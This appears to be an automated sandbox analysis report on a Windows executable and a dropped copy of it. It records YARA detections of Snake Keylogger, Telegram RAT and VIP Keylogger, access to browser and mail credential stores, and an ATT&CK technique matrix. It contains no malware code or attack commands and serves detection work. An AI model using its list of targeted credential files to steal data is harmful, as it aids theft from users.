Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Users\user\Desktop\ckHregxJIq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\ckHregxJIq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 5472, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\ckHregxJIq.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3723375088.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 5472, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 5472, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
